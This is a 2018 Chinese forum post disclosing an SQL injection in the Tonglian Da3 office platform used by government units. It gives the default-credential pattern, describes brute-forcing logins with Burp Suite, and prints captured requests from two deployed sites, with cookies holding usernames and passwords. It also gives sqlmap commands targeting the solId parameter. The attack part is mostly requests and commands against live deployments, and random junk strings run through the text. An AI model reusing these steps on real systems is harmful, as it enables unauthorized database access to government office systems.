找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1544|回复: 0
打印 上一主题 下一主题

同联Da3协同办公平台前台通用sql injection漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2018-10-20 20:15:17 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

( M( W) z" ]2 J5 p
8 v& `5 C. _1 r

9 H/ [3 J% T- m0 K& O" |6 Q9 o. M

% y. P; ^% b/ C+ e) }4 H 平台简介: . \( x% D. \+ d0 O% g7 ]" T

" @5 s8 X# z" f+ [8 Y! C

: I$ ~/ B7 J# d2 a   + J) d: o! [* a' N

$ j2 t: y2 A+ C' B& s; l

# `6 t0 E7 s, {$ E 北京同联信息技术有限公司(以下简称同联)由用友政务与用友原行业事业部团队合伙出资成立。同联以“为全国各级政府单位提供信息化咨询规划、建设解决方案和信息化运维服务,以加强各级政府的精细化、智能化管理,形成高效、敏捷、便民的新型政府。”为使命,致力于为各级政府单位提供专业、标准、灵活、易用的信息化产品及专业的服务。
6 p8 t2 {. |; I 同联面向政府单位提供专业、标准、灵活、易用的信息化产品。针对各级政府单位,分别提供以“移动政务办公”为主的Da3系列管理软件;针对政法单位提供以“协同办案”为核心的政法协同办案系统等。
2 M: A1 z t O. S& s" Q 同联本着“协作、专业、创新”的工作方针,为推动各级政府单位信息化、促进各级政府快速转型为 “智慧型政府”做出积极贡献! : b; F8 k) r. e# f% r* M8 G8 |+ F

6 Z/ L8 Q( d( A5 u

3 o5 j& f( w3 d, u) T! e& C   : d6 A4 S$ d" h Y7 X

Y' r: `5 J0 g3 V" t

. V4 Q2 }( s. q, N& u 由于此程序为新开发的程序,故能找到的案例并不多,下面附案例地址:, A/ d1 V7 J4 ]8 o0 U/ U7 }

f9 F- z$ G- i: V7 q8 g- G. L; j. c

: Y# }. p3 o1 p5 ?6 c  $ P4 ~# t$ X) x8 @3 e/ h G

! h9 z- y& y- C

/ [' Q& ~, k" B3 G5 @$ E& k http://1.1.1.1:7197/cap-aco/#(案例2-)- f. ?2 N* f" ~" n' t0 x a

* R5 O) P* w/ u/ N

6 r, ?! r0 k. ?& r, @* `, y% F, { http://www.XXOO.com (案例1-官网网站) . o: u; q- ]1 p' v9 ]* R# q

6 M x9 d: Q# {& U

5 ]2 t1 R$ g4 G% K3 L   7 A9 k2 q, Q | `. i' R8 U

4 e5 J' i8 V5 F+ R4 @/ b1 e: {4 d

: \. r6 B+ C4 x$ ?( c 漏洞详情: 0 y) r% b _3 h$ P

5 X& s% ]6 K4 I/ W2 s1 y) ?4 m) y

- p) G# k2 k; S% `+ |! S  初步确定平台的默认账号为姓名的首字母小写,初始密码为123,为了能够更好的模拟入侵,使用黑盒测试手段进行测试! Q. E, ?3 h. p# E, H" W

; b1 p$ @: ?: f- _- E5 B2 |) \

8 n l. L) L, O      首先使用burpsuite代理,然后再用黑客字典生成一个全英文小写的3位字典,利用burpsuite进行暴力破解,破解结果如图: + h R# E+ y9 \$ @8 ]+ ?

# s, ?/ Z( e8 _/ h( s

5 l2 k8 d4 l6 K   n; C0 R j; {: M' B1 y9 |* J! [

; _/ z' s! l1 n& p [1 C. `

0 {8 b6 I$ f$ B5 z( e   $ K6 \6 s( T6 [ X2 ^0 S5 k4 o3 g

+ P1 k s5 l/ s; r* r% h: b

: ?. l+ F' J9 h$ M status为302即表示破解成功,然后找个破解成功的账号登录系统。经过长时间的手工测试发现在发文管理模块抓包,抓包的数据分别如下: $ X, t- m0 D6 t6 e/ W0 D4 z$ g

5 e+ \0 E; L. U. ?3 N

+ A: U6 p9 ~( D5 y B 1、案例1-官方网站 ) _0 i9 E9 z- B" e% P3 x

. D$ }& B) w* B- P/ U9 a

6 L1 E# }9 V2 x3 l* O GET /bpmRuBizInfoController/findBpmRuBizInfoBySolId?rows=10&page=0&solId=42b0234e-d5dc-402d-9cef-1ce38cbae480&state=&title=1111&sortOrder=DESC&query=bizTitle_%3D%26URGENCY_%3D%26STATE_%3D%26startTime%3D%26endTime%3D&_=1510060789826 HTTP/1.11 I4 X; t+ d; d

5 h2 ^0 K& ^% l+ P( S

. ?$ [# @+ t- G% x1 D' E9 F, s2 K% P Host: www.XXOO.com , l: ^ A% _' K" p$ }. _

# R6 N4 F1 z7 g) k; \, W$ `

. d, h% i$ \3 d Proxy-Connection: Keep-Alive % R, o* n6 Y' R! A6 [

4 c0 o$ K% h6 H' X3 D7 E1 E

; _* h5 D S& z9 s' p; q: r: U$ y Accept: application/json, text/javascript, */*; q=0.01 8 j: d5 x9 E% R$ F: b4 k* _0 Y* `0 n

L- X5 x0 l {$ X

5 I2 m/ R$ h3 g, i& I Accept-Language: zh-CN1 c. E. X; B2 P7 v" R

2 `( K% a4 C' F% j

. k) a6 y! `7 P Content-Type: application/json O# b& K4 y( S, I

0 }/ O) z; k5 l4 p8 g1 l$ f& V

, c9 s% {" k& D3 m& r H3 ^8 ^3 o. ? User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0; SE 2.X MetaSr 1.0) like Gecko 9 f8 x0 |( H) T% m+ v% C

7 @" t# `& y ^$ E7 _8 u. m

/ L6 t0 I L4 t- O7 C$ e X-Requested-With: XMLHttpRequest& H1 y! R7 d" W3 Y, U$ i* m

& w0 f( v. }9 G! E: t

- `/ h; V+ d3 Q7 V) \ S Referer: http://www.XXOO.com/bizRunContro ... 80?modCode=1008M002 F4 \! w7 d& l+ t

5 w- [7 H, h3 ?( C1 ]

! }+ [ T# D; _. a8 }) r Accept-Encoding: gzip, deflate, sdch4 l# ?; F6 X/ M$ y t) {# ~" x

# S/ C8 V4 R( M- h- N% l! K

3 h) [" q# s+ U h1 G3 P Cookie: username=chm; password=123; rememberme=1; autoSubmit=1; sid=2cf5142f-6c1e-4cbb-89d8-2ebd08438b2e ( {3 w5 f7 L. B8 Y, s2 ^

3 e2 {7 j. S+ z7 a I$ i/ e

/ k) D1 a9 f( J1 }) j0 ^1 I 将上面post数据包复制到txt文本里保存为tl.txt并将其放到sqlmap根目录下利用sqlmap注入命令为:sqlmap.py -r tl.txt --dbms=mysql --level 5 --risk 3 --tamper=space2hash.py -p solId --is-dba 注入如图: 9 D, v9 J1 F4 _- s6 \

8 z5 U& f/ ^7 |3 p

. h2 D( g1 v5 \3 f1 P5 k   : }6 m+ Q0 ^# j+ n

. x: _ K/ n7 M3 }3 d& A3 i {

/ _- r5 w) Q4 o. z6 _1 w+ t. U   : w- s! J, h' l+ z% b3 f

# G5 ^7 F% C% l/ C4 q

- A+ t6 t9 I( L- ]( K! V D- R  . F8 U- W2 h4 P- E2 _$ Y

0 z3 P) w, H6 e% q ~, r

; ~3 i) S2 Q2 V* n. Y2 G; A   " h1 g# {1 a9 L1 s5 G6 m

/ o9 o- g/ r# V

. Z7 H" T- b9 ~ G0 @   c, C9 |+ M5 k- {. _* d

) x' C) U$ C7 O: r

' [# I5 `0 H/ @6 i 2、案例2-某天河云平台/ `5 F4 J7 F3 U% K1 A

1 N# E5 s, _3 Y7 C Q

- {- G% F5 c9 v GET /cap-aco/bpmRuBizInfoController/findBpmRuBizInfoBySolId?rows=10&page=0&solId=af056885-4ae5-4e0b-8a0d-c413a786f2db&state=&title=11111&sortOrder=DESC&query=bizTitle_%3D%26URGENCY_%3D%26STATE_%3D%26startTime%3D%26endTime%3D&_=1510047738662 HTTP/1.1% a1 z! k. K$ V2 M$ u

! g& d( W2 g, d1 S

5 d5 y2 D1 C; Z' e u Host: 1.1.1.:7197' p' P5 [, u+ w9 |

0 F* a) m$ b2 w7 w2 y: r

" `: Z6 j: J+ c! D Accept: application/json, text/javascript, */*; q=0.01 3 P# r5 \4 g/ ?$ @

. ^+ D; {! f m) d, \8 _; Q

- N1 b. W8 ^1 j6 u) Z* r% r0 a: Z0 | X-Requested-With: XMLHttpRequest & {- Y. l5 ^1 c1 Y! U( v( ~. B

, C0 w( e$ N2 k' X* @- E0 {

5 q# h [! c/ f' o8 x+ U1 R User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.221 Safari/537.36 SE 2.X MetaSr 1.0 ( o: L2 E$ i' {9 c% q, v4 @( k

3 K! x. E! o. p

, X w' G' W6 B. m5 ~+ B Content-Type: application/json ' h: t2 r+ o+ k0 G! a

0 u! X( L% F5 ~: O5 v) N8 v

; j( n O0 Y3 P A0 z Referer: http://1.1.1.1:7197/cap-aco/bizR ... 86f2db?modCode=10084 y* H3 Q+ N% R4 X/ H

0 Y( s; H. p; `" x

6 C' M9 `' }6 C# R' B. r. [$ p6 e Accept-Language: zh-CN,zh;q=0.8 # R! J, k G M Q; q& H; o2 d7 v

E6 O( K/ w5 A: ~ Z0 Q$ l

; V) j9 {8 t u7 ] Cookie: autoSubmit=1; sid=4e333ec9-d194-456b-bb08-4ff64c6eb1fc; username=lxr; password=123; rememberme=1; autoSubmit=1 8 V8 q5 V* `; f. v& @) q3 N9 ?5 l

0 o! I" t2 T+ x# a' R

( n2 ]: E+ _' Q$ `+ p Connection: close' l* F$ A) f" `" b# m) L' m

9 I) \/ ~3 S& R. N( K% w- w

" U' _" g& |2 I& N) a0 O 将上面post数据包复制到txt文本里保存为tl.txt并将其放到sqlmap根目录下利用sqlmap注入命令为:sqlmap.py -r 1.txt --dbms=mysql --level 5 --risk 3 --tamper=space2hash.py -p solId --is-dba 注入如图: + |4 m4 @# E2 ~! u

! s2 j# e: c5 o5 q: ~- h. R

8 ~- W" u* m4 w9 a3 e* i   # T' L( c: s# [5 I

/ e& [( x; m% j& X/ o9 p7 ?. S

/ P/ c* l' J. W5 v4 M4 B
3 Z& o5 {/ P. [8 u

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表